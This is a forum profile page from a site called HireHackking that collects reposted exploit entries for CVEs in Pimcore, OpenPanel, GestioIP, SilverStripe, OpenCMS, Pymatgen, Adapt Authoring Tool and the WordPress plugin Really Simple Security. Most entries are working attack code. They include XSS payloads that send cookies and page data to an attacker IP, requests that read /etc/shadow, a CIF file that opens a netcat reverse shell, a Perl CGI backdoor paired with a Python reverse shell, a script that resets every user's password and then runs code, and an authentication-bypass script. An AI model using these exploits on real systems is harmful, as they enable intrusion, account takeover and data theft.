Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Pimcore 11.4.2 - Stored cross site scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Authenticated Stored Cross-Site Scripting (XSS) Via Search Document # Google Dork: N/A # Date: 1/28/2025 # Exploit Author: maeitsec # Vendor Homepage: https://pimcore.com/ # Software Link: https://github.com/pimcore/pimcore # Version: Pimcore 10.5.x (prior to 10.5.21) and 11.x (prior to 11.1.1) # Tested on: Pimcore 10.5.20 on Ubuntu 20.04 # CVE: CVE-2024-11954 --- ### Description: A stored Cross-Site Scripting (XSS) vulnerability exists in Pimcore's Data Object Classification Store functionality. The vulnerability arises due to insufficient input sanitization, allowing an authenticated attacker with access to the classification store to inject malicious JavaScript code. This code is then executed in the context of other users' browsers when they view the affected data. ### Proof of Concept (PoC): 1. Log in to the Pimcore backend as a user with access to the Data Object Classification Store. 2. Navigate to the Classification Store and create or edit a key. 3. Inject the following payload into the key value: ```html <script>alert('XSS')</script> 4. Save the file and view it in the frontend or backend. The JavaScript alert will execute, demonstrating the vulnerability.
  2. HireHackking

    OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal # Date: Nov 25, 2024 # Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee # Vendor Homepage: https://openpanel.com/ # Software Link: https://openpanel.com/ # Version: 0.3.4 # Tested on: macOS # CVE : CVE-2024-53582 GET /view_file?filename=shadow&path_param=/etc HTTP/2 Host: demo.openpanel.org:2083 Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://demo.openpanel.org:2083/files/ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=0 Te: trailers
  3. HireHackking

    OpenPanel 0.3.4 - OS Command Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: OpenPanel 0.3.4 - OS Command Injection # Date: Nov 25, 2024 # Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee # Vendor Homepage: https://openpanel.com/ # Software Link: https://openpanel.com/ # Version: 0.3.4 # Tested on: macOS # CVE : CVE-2024-53584 POST /server/timezone HTTP/2 Host: demo.openpanel.org:2083 Cookie: minimenu=0; session=eyJfZnJlc2giOmZhbHNlLCJ1c2VyX2lkIjozfQ.ZyyaKQ.HijWQTQ_I0yftDYEqqqqRR_FuRU; theme=dark User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://demo.openpanel.org:2083/server/timezone Content-Type: application/x-www-form-urlencoded Content-Length: 51 Origin: https://demo.openpanel.org:2083 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=0 Te: trailers timezone=;cat+/etc/shadow+>+/home/stefan/secret.txt
  4. HireHackking

    GestioIP 3.5.7 - Cross-Site Request Forgery (CSRF)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Request Forgery (CSRF) # Exploit Author: m4xth0r (Maximiliano Belino) # Author website: https://maxibelino.github.io/ # Author email : max.cybersecurity at belino.com # GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50858 # Date: 2025-01-13 # Vendor Homepage: https://www.gestioip.net/ # Software Link: https://www.gestioip.net/en/download/ # Version: GestioIP v3.5.7 # Tested on: Kali Linux # CVE: CVE-2024-50858 ### Description The GestioIP application has many endpoints and they are vulnerable to CSRF. This allows an attacker to execute actions through the admin's browser on the application if the admin visits a malicious URL hosted by the attacker. These actions can modify, delete, or exfiltrate data from the application. ### Prerequisites The option "Manage - Manage GestioIP - User Management" must be enabled previously. ### Usage To exploit this vulnerability, an attacker must host ```payload.html``` on an attacker-controlled web server (python3 -m http.server 8090). When an authenticated administrator goes to the attacker's website, the CSRF will execute making the attacker an administrator. ### File: payload.html #### example: editing user named 'maxi' <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Welcome to our site</title> <style> body { font-family: Arial, sans-serif; text-align: center; } .container { margin-top: 50px; } iframe { display: none; } </style> </head> <body> <div class="container"> <h1>Thank you for visiting our site!</h1> <p>We are processing your request, please wait a moment...</p> <img src="https://placehold.co/150?text=Processing" alt="Processing..."> </div> <!-- hidden iframe --> <iframe name="hiddenFrame"></iframe> <!-- The form that makes the POST to GestioIP Server --> <form action="[http://localhost/gestioip/res/ip_mod_user.cgi](http://localhost/gestioip/res/ip_mod_user.cgi)" method="POST" target="hiddenFrame"> <input type="hidden" name="name" value="maxi"> <input type="hidden" name="group_id" value="1"> <input type="hidden" name="email" value="maxi@test.com"> <input type="hidden" name="phone" value="123"> <input type="hidden" name="comment" value=""> <input type="hidden" name="client_id" value="1"> <input type="hidden" name="id" value="2"> <input type="hidden" name="B2" value=""> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>
  5. HireHackking

    SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated) # Date: 2025-01-15 # Exploit Author: James Nicoll # Vendor Homepage: https://www.silverstripe.org/ # Software Link: https://www.silverstripe.org/download/ # Category: Web Application # Version: 5.2.22 # Tested on: SilverStripe 5.2.22 - Ubuntu 24.04 # CVE : CVE-2024-47605 ## Explanation: When using the "insert media" functionality, the linked oEmbed JSON includes an HTML attribute which will replace the embed shortcode. The HTML is not sanitized before replacing the shortcode, allowing a script payload to be executed on both the CMS and the front-end of the website. ## Requirements 1. A Silverstripe CMS website. 2. Valid login credentials for a user with page edit rights. 3. An attacker server hosting malicious payload. ## On the attacker server: 1. Create an html file with oembded information: ``` <html> <head> <link rel="alternate" type="application/json+oembed" href="http://<attacker_server_ip>/oembed.json" title="Payload" /> </head> <body> <img src="media.jpg"> </body> </html> ``` 2. Create the json file with XSS payload: ``` { "title": "Title", "author_name": "author", "type": "video", "height": 113, "width": 200, "version": "1.0", "provider_name": "FakeSite", "thumbnail_height": 360, "thumbnail_width": 480, "thumbnail_url": "http://<attacker_server_ip>/media.jpg", "html":"<script>alert('hello world');</script>" } ``` 3. The media.jpg file can be any image. 4. Host these files on a publicly available website ## On the SilverStripe website: 1. Log into the admin portal with a user account that has page editor rights (or higher). 2. Select the page you wish to load the malicious content into. 3. Within the editor panel, select the "Insert Media via URL" button. 4. Enter the IP/Hostname of the attacker server. 5. Click Add Media, Insert Media, and then save and publish the page.
  6. HireHackking

    GestioIP 3.5.7 - Stored Cross-Site Scripting (Stored XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Stored Cross-Site Scripting # Exploit Author: m4xth0r (Maximiliano Belino) # Author website: https://maxibelino.github.io/ # Author email: max.cybersecurity at belino.com # GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50861 # Date: 2025-01-13 # Vendor Homepage: https://www.gestioip.net/ # Software Link: https://www.gestioip.net/en/download/ # Version: GestioIP v3.5.7 # Tested on: Kali Linux # CVE: CVE-2024-50861 ### Description The http://localhost/gestioip/res/ip_mod_dns_key_form.cgi feature of GestioIP 3.5.7 is vulnerable to Stored XSS. An authenticated attacker with appropriate permissions can inject malicious code into the tsig_key form field and save it to the database. Once saved, any user who accesses the "DNS Key" page will trigger the Stored XSS, leading to the execution of malicious code. ### Prerequisites 1. Enable "DNS Key" Feature First, ensure that "Dynamic DNS updates" is enabled in the global configuration: Manage > Manage GestioIP > Global Configuration > Dynamic DNS updates enabled: yes This will enable the following menus: Manage > DNS Keys Manage > DNS Update User 2. Create a DNS Key Entry To create a new DNS key entry and also edit an existing one, the user must belong to a group with the "Manage Sites And Categories" permission. By default, "Admin" and "GestioIP Admin" groups have this permission. Also, you can configure this permission to any group under: Manage > User Groups > Manage Sites and Categories 3. Enter payload. Once group permission is set, input one of the following payloads into the "TSIG Key" (tsig_key) field and save it. ### Payloads 1 - Test basic XSS <script>alert("test")</script> 2 - Send data (cookies) to the attacker's server <svg/onload="fetch('http://10.20.0.1:8000/steal_data',{method:'POST',body:document.cookie})"> 3 - Redirect the user to a malicious site <svg/onload="window.location='http://10.20.0.1:8090/malicious_page.html'">
  7. HireHackking

    GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS) # Exploit Author: m4xth0r (Maximiliano Belino) # Author website: https://maxibelino.github.io/ # Author email (max.cybersecurity at belino.com) # GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50859 # Date: 2025-01-13 # Vendor Homepage: https://www.gestioip.net/ # Software Link: https://www.gestioip.net/en/download/ # Version: GestioIP v3.5.7 # Tested on: Kali Linux # CVE: CVE-2024-50859 ### Description The ip_import_acl_csv request is vulnerable to Reflected XSS (Reflected Cross-Site Scripting); the user can upload a file and the file content is reflected in the HTML response without being sanitized. If the file uploaded by the user has an incorrect format and an error occurs during its processing, part of the file's content may be displayed in the browser. If this content includes HTML or scripts and it is not properly escaped, the browser could interpret it, leading to a security vulnerability. This could allow data exfiltration and enabling CSRF (Cross-Site Request Forgery) attacks. Proper input validation and output encoding are critical to prevent this vulnerability. ### Prerequisites Enable (set to 'yes') the parameter: Manage > Manage GestioIP > ACL connection management ### Usage Select: import/export > Import ACLs/ACL Connections Select: "Connection List" Select "report only" Browse to select the file you want to upload. Click 'upload' ### Payloads #### 1) html file to upload <html><script src="http://10.20.0.1:8090/refxss_exfiltrate_3.js"></script></html> #### 2) js file to exfiltrate data var req1 = new XMLHttpRequest(); req1.open('GET',"http://localhost/gestioip/res/ip_show_user.cgi", false); req1.send(); response = req1.responseText; var req2 = new XMLHttpRequest(); req2.open('POST', "http://10.20.0.1:8000/steal_data", false); req2.setRequestHeader('Content-Type', 'text/html'); req2.send(response);
  8. HireHackking

    Pymatgen 2024.1 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title : Pymatgen 2024.1 - Remote Code Execution (RCE) # Google Dork : (not applicable) # Date : 2024-11-13 # Exploit Author : Mohammed Idrees Banyamer # Vendor Homepage : https ://pymatgen.org # Software Link : https ://pypi.org /project /pymatgen/ # Version : 2024.1 # Tested on : Kali Linux 2024.1 # CVE : CVE-2024-23346 import os # Function to create the malicious CIF file def create_malicious_cif(ip, port): # Constructing the malicious CIF file with reverse shell payload malicious_cif = f""" data_5yOhtAoR _audit_creation_date 2024-11-13 _audit_creation_method "CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit" loop_ _parent_propagation_vector.id _parent_propagation_vector.kxkykz k1 [0 0 0] _space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {ip} {port} -e /bin/bash");0,0,0' _space_group_magn.number_BNS 62.448 _space_group_magn.name_BNS "P n' m a' " """ # Save to a file with open("vuln.cif", "w") as file: file.write(malicious_cif) print("[*] Malicious CIF file created: vuln.cif") # Function to trigger the exploit by parsing the malicious CIF file def exploit(): ip = input("Enter your IP address for the reverse shell: ") port = input("Enter the port for the reverse shell to listen on: ") # Create the malicious CIF file create_malicious_cif(ip, port) # Trigger the Pymatgen CIF parser to parse the malicious file from pymatgen.io.cif import CifParser parser = CifParser("vuln.cif") structure = parser.parse_structures() # Running the exploit if __name__ == "__main__": exploit()
  9. HireHackking

    Spring Boot common-user-management 0.1 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Unrestricted File Upload # Google Dork: # Date: 14/Nov/2024 # Exploit Author: d3sca # Vendor Homepage: https://github.com/OsamaTaher/Java-springboot-codebase # Software Link: https://github.com/OsamaTaher/Java-springboot-codebase # Version: [app version] 0.1 # Tested on: Debian Linux # CVE : CVE-2024-52302 # Steps to Reproduce: # Upload Malicious File: Send a PUT request to /api/v1/customer/profile-picture using customer with role 26,17 added with a malicious file payload (e.g., .jsp, .php, .html). # GET the file location: Send GET request /api/v1/customer/my-profile , grap the file location in response with the profile's link. # Execute the Uploaded File: Using the file name access the file directly through the URL returned in the response. # If the server supports the uploaded file type, it will execute the file, leading to Remote Code Execution. import requests import argparse import sys requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) def login(url, username, password): """Authenticate with the API and return the Bearer token.""" login_endpoint = f"{url}/api/v1/user/login" headers = {"Content-Type": "application/json"} payload = { "username": username, "password": password } try: response = requests.post(login_endpoint, json=payload, headers=headers, verify=False) response.raise_for_status() # Extract token token = response.json().get("token") if not token: print("[!] Token not found in response. Exiting.") sys.exit(1) print("[+] Authentication successful. Token acquired.") return token except Exception as e: print(f"[!] Login failed: {e}") sys.exit(1) def upload_file(url, token, file_path): """Upload a file to the profile picture endpoint using the Bearer token.""" upload_endpoint = f"{url}/api/v1/customer/profile-picture" headers = { "Authorization": f"Bearer {token}" } files = { "file": open(file_path, "rb") } try: response = requests.post(upload_endpoint, headers=headers, files=files, verify=False) response.raise_for_status() if response.status_code == 200: print("[+] File uploaded successfully.") print(f"[+] Response: {response.text}") else: print(f"[!] Failed to upload file. Status code: {response.status_code}") print(f"[!] Response: {response.text}") except Exception as e: print(f"[!] File upload failed: {e}") sys.exit(1) def main(): parser = argparse.ArgumentParser(description="Exploit script for unrestricted file upload vulnerability.") parser.add_argument("-u", "--username", required=True, help="Username for login") parser.add_argument("-p", "--password", required=True, help="Password for login") parser.add_argument("-f", "--file", required=True, help="File to upload") parser.add_argument("-url", "--url", required=True, help="Base URL of the target application (e.g., https://target.com)") args = parser.parse_args() # Authenticate token = login(args.url, args.username, args.password) # Upload the file upload_file(args.url, token, args.file) if __name__ == "__main__": main()
  10. HireHackking

    GestioIP 3.5.7 - Remote Command Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: GestioIP 3.5.7 - Remote Command Execution (RCE) # Exploit Author: m4xth0r (Maximiliano Belino) # Author website: https://maxibelino.github.io/ # Author email (max.cybersecurity at belino.com) # GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-48760 # Date: 2025-01-13 # Vendor Homepage: https://www.gestioip.net/ # Software Link: https://www.gestioip.net/en/download/ # Version: GestioIP v3.5.7 # Tested on: Kali Linux # CVE: CVE-2024-48760 import requests import sys # Config username = "gipadmin" password = "PASSWORD" domain = "localhost" local_ip = "10.20.0.1" local_port = 443 target_url = f"http://{domain}/gestioip/api/upload.cgi" # CGI Backdoor Perl backdoor_code = """#!/usr/bin/perl -w use strict; print "Cache-Control: no-cache\\n"; print "Content-type: text/html\\n\\n"; my $req = $ENV{QUERY_STRING}; chomp ($req); $req =~ s/%20/ /g; $req =~ s/%3b/;/g; $req =~ s/%7c/|/gi; $req =~ s/%27/'/g; $req =~ s/%22/"/g; $req =~ s/%5D/]/g; $req =~ s/%5B/[/g; print "<html><body>"; print '<!-- CGI backdoor -->'; if (!$req) { print "Usage: http://domain/gestioip/api/upload.cgi?whoami"; } else { print "Executing: $req"; } print "<pre>"; my @cmd = `$req`; print "</pre>"; foreach my $line (@cmd) { print $line . "<br/>"; } print "</body></html>"; """ # Exploit functions def upload_file(session, file_name, file_data): """Uploads the file to the server""" files = { 'file_name': (None, file_name), 'leases_file': (file_name, file_data) } response = session.post(target_url, files=files) if "OK" not in response.text: print(f"[!] Error uploading {file_name}.") sys.exit(1) return response def run_command(session, cmd): """Execute a command in the server through the vuln""" url = target_url + '?' + cmd resp = session.get(url) print(resp.text) def backdoor_exists(session): """Verifies if backdoor is already uploaded or not""" response = session.get(target_url + "?whoami") if "www-data" in response.text: return True # backdoor already uploaded return False # backdoor not uploaded yet if __name__ == '__main__': with requests.Session() as session: session.auth = (username, password) # Verify if backdoor is already uploaded if not backdoor_exists(session): print("\n[!] Uploading backdoor...\n") upload_file(session, 'upload.cgi', backdoor_code) else: print("\n[+] Backdoor already uploaded. Continue...\n") # Execute the reverse shell print("\n[!] Executing reverse shell...\n") reverse_shell_cmd = f'python3 -c "import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((\'{local_ip}\', {local_port})); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); p=subprocess.call([\'/bin/sh\', \'-i\']);"' run_command(session, reverse_shell_cmd)
  11. HireHackking

    GestioIP 3.5.7 - Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Scripting (XSS) # Exploit Author: m4xth0r (Maximiliano Belino) # Author website: https://maxibelino.github.io/ # Author email (max.cybersecurity at belino.com) # GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50857 # Date: 2025-01-13 # Vendor Homepage: https://www.gestioip.net/ # Software Link: https://www.gestioip.net/en/download/ # Version: GestioIP v3.5.7 # Tested on: Kali Linux # CVE: CVE-2024-50857 ### Description The `"ip_do_job"` feature of GestioIP 3.5.7 is vulnerable to XSS, leading to data exfiltration and CSRF attacks. Two examples are described below. ### Prerequisites To successfully exploit the XSS vulnerability, the user must be part of a "User Group" that has the following three permissions: • Show backuped device configurations (read_device_config_perm) • Upload device configurations (write_device_config_perm) • Administrate CM (administrative_cm_perm) 1) vulnerable parameter: `host_id` http://localhost/gestioip/res/cm/ip_do_job.cgi?client_id=1&host_id='<script>alert("test")</script>' 2) vulnerable parameter: `stored_config` http://localhost/gestioip/res/cm/ip_do_job.cgi?client_id=1&stored_config='<script>alert("test")</script>'
  12. HireHackking

    OpenCMS 17.0 - Stored Cross Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: OpenCMS 17.0 - Stored Cross Site Scripting (XSS) # Date: 24-11-2024 # Exploit Author: Siddhartha Naik # Vendor Homepage: http://www.opencms.org/en/ # Software Link: http://www.opencms.org/en/modules/downloads/begindownload.html?id=dade528f-ec17-11ee-ab97-7fde8b0295e1 # Affected Version: 17.0 # Category: WebApps # Tested on: Windows 11 # CVE : CVE-2024-41447 1. Vendor Description: OpenCms from Alkacon Software is a professional, easy to use website content management system. OpenCms helps content managers worldwide to create and maintain beautiful websites fast and efficiently. 2. Technical Description: This is a Stored XSS vulnerability in the author field seen when publishing an article. This vulnerability has been tested on latest versions of Brave and Firefox browsers. It is believed to affect any user who clicks on the "Read More" button of the affected article and can be exploited by any user who is able to modify/create articles. 3. Proof Of Concept: a) Start by creating a new article. In the author field write your script like so: <script>alert(1)</script> b) Save and publish the article c) The user who clicks on the read more button gets a popup saying '1' 4. Solution: Upgrade to latest release. http://www.opencms.org/en/home/news.html 5. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41447 https://github.com/Sidd545-cr/CVE/blob/main/CVE-2024-41447%20-%20Stored%20XSS%20in%20author%20field.pdf http://alkacon.com http://opencms.com
  13. HireHackking

    Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE) # Date: 2024-11-24 # Exploit Author: Eui Chul Chung # Vendor Homepage: https://www.adaptlearning.org/ # Software Link: https://github.com/adaptlearning/adapt_authoring # Version: 0.11.3 # CVE Identifier: CVE-2024-50672 , CVE-2024-50671 import io import sys import json import zipfile import argparse import requests import textwrap def get_session_cookie(username, password): data = {"email": username, "password": password} res = requests.post(f"{args.url}/api/login", data=data) if res.status_code == 200: print(f"[+] Login as {username}") return res.cookies.get_dict() return None def get_users(): session_cookie = get_session_cookie(args.username, args.password) if session_cookie is None: print("[-] Login failed") sys.exit() res = requests.get(f"{args.url}/api/user", cookies=session_cookie) users = [ {"email": user["email"], "role": user["roles"][0]["name"]} for user in json.loads(res.text) ] roles = {"Authenticated User": 1, "Course Creator": 2, "Super Admin": 3} users.sort(key=lambda user: roles[user["role"]]) for user in users: print(f"[+] {user['email']} ({user['role']})") return users def reset_password(users): # Overwrite potentially expired password reset tokens for user in users: data = {"email": user["email"]} requests.post(f"{args.url}/api/createtoken", data=data) print("[+] Generate password reset token for every user") valid_characters = "0123456789abcdef" next_tokens = ["^"] # Ensure that only a single result is returned at a time while next_tokens: prev_tokens = next_tokens next_tokens = [] for token in prev_tokens: for ch in valid_characters: data = {"token": {"$regex": token + ch}, "password": "HaXX0r3d!"} res = requests.put( f"{args.url}/api/userpasswordreset/w00tw00t", json=data, ) # Multiple results returned if res.status_code == 500: next_tokens.append(token + ch) print("[+] Reset every password to HaXX0r3d!") def create_plugin(plugin_name): manifest = { "name": plugin_name, "version": "1.0.0", "extension": "exploit", "main": "/js/main.js", "displayName": "exploit", "keywords": ["adapt-plugin", "adapt-extension"], "scripts": {"adaptpostcopy": "/scripts/postcopy.js"}, } property = { "properties": { "pluginLocations": { "type": "object", "properties": {"course": {"type": "object"}}, } } } payload = textwrap.dedent( f""" const {{ exec }} = require("child_process"); module.exports = async function (fs, path, log, options, done) {{ try {{ exec("{args.command}"); }} catch (err) {{ log(err); }} done(); }}; """ ).strip() plugin = io.BytesIO() with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file: zip_file.writestr( f"{plugin_name}/bower.json", io.BytesIO(json.dumps(manifest).encode()).getvalue(), ) zip_file.writestr( f"{plugin_name}/properties.schema", io.BytesIO(json.dumps(property).encode()).getvalue(), ) zip_file.writestr( f"{plugin_name}/js/main.js", io.BytesIO("".encode()).getvalue() ) zip_file.writestr( f"{plugin_name}/scripts/postcopy.js", io.BytesIO(payload.encode()).getvalue(), ) plugin.seek(0) return plugin def find_plugin(cookies, plugin_type, plugin_name): res = requests.get(f"{args.url}/api/{plugin_type}type", cookies=cookies) for plugin in json.loads(res.text): if plugin["name"] == plugin_name: return plugin["_id"] return None def create_course(cookies): data = {} res = requests.post(f"{args.url}/api/content/course", cookies=cookies, json=data) course_id = json.loads(res.text)["_id"] data = {"_courseId": course_id, "_parentId": course_id} res = requests.post( f"{args.url}/api/content/contentobject", cookies=cookies, json=data, ) content_id = json.loads(res.text)["_id"] data = {"_courseId": course_id, "_parentId": content_id} res = requests.post(f"{args.url}/api/content/article", cookies=cookies, json=data) article_id = json.loads(res.text)["_id"] data = {"_courseId": course_id, "_parentId": article_id} res = requests.post(f"{args.url}/api/content/block", cookies=cookies, json=data) block_id = json.loads(res.text)["_id"] component_id = find_plugin(cookies, "component", "adapt-contrib-text") data = { "_courseId": course_id, "_parentId": block_id, "_component": "text", "_componentType": component_id, } requests.post(f"{args.url}/api/content/component", cookies=cookies, json=data) return course_id def rce(users): session_cookie = None for user in users: if user["role"] == "Super Admin": session_cookie = get_session_cookie(user["email"], "HaXX0r3d!") break if session_cookie is None: print("[-] Failed to login as Super Account") sys.exit() plugin_name = "adapt-contrib-xapi" print(f"[+] Create malicious plugin : {plugin_name}") plugin = create_plugin(plugin_name) print("[+] Scan installed plugins") plugin_id = find_plugin(session_cookie, "extension", plugin_name) if plugin_id is None: print(f"[+] {plugin_name} not found") else: print(f"[+] Found {plugin_name}") print(f"[+] Remove {plugin_name}") requests.delete( f"{args.url}/api/extensiontype/{plugin_id}", cookies=session_cookie, ) print("[+] Upload plugin") files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")} requests.post( f"{args.url}/api/upload/contentplugin", cookies=session_cookie, files=files, ) print("[+] Find uploaded plugin") plugin_id = find_plugin(session_cookie, "extension", plugin_name) if plugin_id is None: print(f"[-] {plugin_name} not found") sys.exit() print(f"[+] Plugin ID : {plugin_id}") print("[+] Add plugin to new courses") data = {"_isAddedByDefault": True} requests.put( f"{args.url}/api/extensiontype/{plugin_id}", cookies=session_cookie, json=data, ) print("[+] Create a new course") course_id = create_course(session_cookie) print("[+] Build course") res = requests.get( f"{args.url}/api/output/adapt/preview/{course_id}", cookies=session_cookie, ) if res.status_code == 200: print("[+] Command execution succeeded") else: print("[-] Command execution failed") print("[+] Remove course") requests.delete( f"{args.url}/api/content/course/{course_id}", cookies=session_cookie, ) def main(): print("[*] Retrieve user information") users = get_users() print("\n[*] Reset password") reset_password(users) print("\n[*] Perform remote code execution") rce(users) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument( "-u", dest="url", help="Site URL (e.g. www.adaptlearning.org)", type=str, required=True, ) parser.add_argument( "-U", dest="username", help="Username to authenticate as", type=str, required=True, ) parser.add_argument( "-P", dest="password", help="Password for the specified username", type=str, required=True, ) parser.add_argument( "-c", dest="command", help="Command to execute (e.g. touch /tmp/pwned)", type=str, default="touch /tmp/pwned", ) args = parser.parse_args() main()
  14. HireHackking

    Really Simple Security 9.1.1.1 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/env python3 # Exploit Title: Really Simple Security 9.1.1.1 - Authentication Bypass # Date: 2024-11-19 # Exploit Author: Antonio Francesco Sardella # Vendor Homepage: https://really-simple-ssl.com/ # Software Link: https://really-simple-ssl.com/ # Version: Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1 # Tested on: 'WordPress 6.7.0' in Docker container (vulnerable application), 'Ubuntu 24.04.1 LTS' with 'Python 3.12.3' (script execution) # CVE: CVE-2024-10924 # Category: WebApps # Repository: https://github.com/m3ssap0/wordpress-really-simple-security-authn-bypass-exploit # Vulnerability discovered and reported by: István Márton # This is a Python3 program that exploits Really Simple Security < 9.1.2 authentication bypass vulnerability. # This makes it possible for unauthenticated attackers to log in as any existing user on the site, # such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default). # https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass # https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl # DISCLAIMER: This tool is intended for security engineers and appsec people for security assessments. # Please use this tool responsibly. I do not take responsibility for the way in which any one uses # this application. I am NOT responsible for any damages caused or any crimes committed by using this tool. import argparse import json import logging import random import requests import string import validators from requests.auth import HTTPBasicAuth VERSION = "v1.0 (2024-11-19)" DEFAULT_LOGGING_LEVEL = logging.INFO def parse_arguments(): parser = argparse.ArgumentParser( description=f"Exploit for Really Simple Security < 9.1.2 authentication bypass vulnerability (CVE-2024-10924). - {VERSION}" ) parser.add_argument("-t", "--target", required=True, help="URL of the target WordPress") parser.add_argument("-uid", "--user-id", required=False, default=1, help="Victim user ID (1 is usually the admin).") parser.add_argument("-v", "--verbose", action="store_true", required=False, default=False, help="verbose mode") return parser.parse_args() def validate_input(args): try: validators.url(args.target) except validators.ValidationFailure: raise ValueError("Invalid target URL!") try: if int(args.user_id) < 1: raise ValueError("Invalid user ID!") except ValueError: raise ValueError("Invalid user ID!") def send_request(url, user_id): logging.info("Sending request to target WordPress.") target_endpoint = f"{url}" if not target_endpoint.endswith("/"): target_endpoint = f"{target_endpoint}/" target_endpoint = f"{target_endpoint}?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding" headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36", } body = { "user_id": int(user_id), "login_nonce": "".join(random.choices(string.digits, k=10)), "redirect_to": "/wp-admin/" } logging.debug(f"Body: {body}") try: r = requests.post(target_endpoint, headers=headers, json=body , verify=False) logging.info(f"Request sent to target WordPress (HTTP {r.status_code}).") except Exception as e: logging.fatal("Error in contacting the target WordPress.") logging.fatal(e) return if r.status_code == 200 and r.headers["Set-Cookie"] is not None and "redirect_to" in r.text and "=deleted;" not in r.headers["Set-Cookie"]: logging.info(f"Cookie received:\n---------------------\n{r.headers["Set-Cookie"]}\n---------------------") else: logging.fatal("Wrong response received from the target WordPress.") logging.debug(f"Cookie and body received:\n---------------------\n{r.headers["Set-Cookie"]}\n---------------------\n{r.text}\n---------------------") def main(): args = parse_arguments() logging_level = DEFAULT_LOGGING_LEVEL if args.verbose: logging_level = logging.DEBUG logging.basicConfig(level=logging_level, format="%(asctime)s - %(levelname)s - %(message)s") validate_input(args) target = args.target.strip() user_id = int(args.user_id) logging.info(f"Exploit for Really Simple Security < 9.1.2 authentication bypass vulnerability (CVE-2024-10924). - {VERSION}") logging.debug("Parameters:") logging.debug(f" target = {target}") logging.debug(f" user_id = {user_id}") send_request(target, user_id) logging.info("Finished.") if __name__ == "__main__": main()
  15. HireHackking

    Plane 0.23.1 - Server side request forgery (SSRF)

    HireHackking posted a blog entry in Hacker Technology
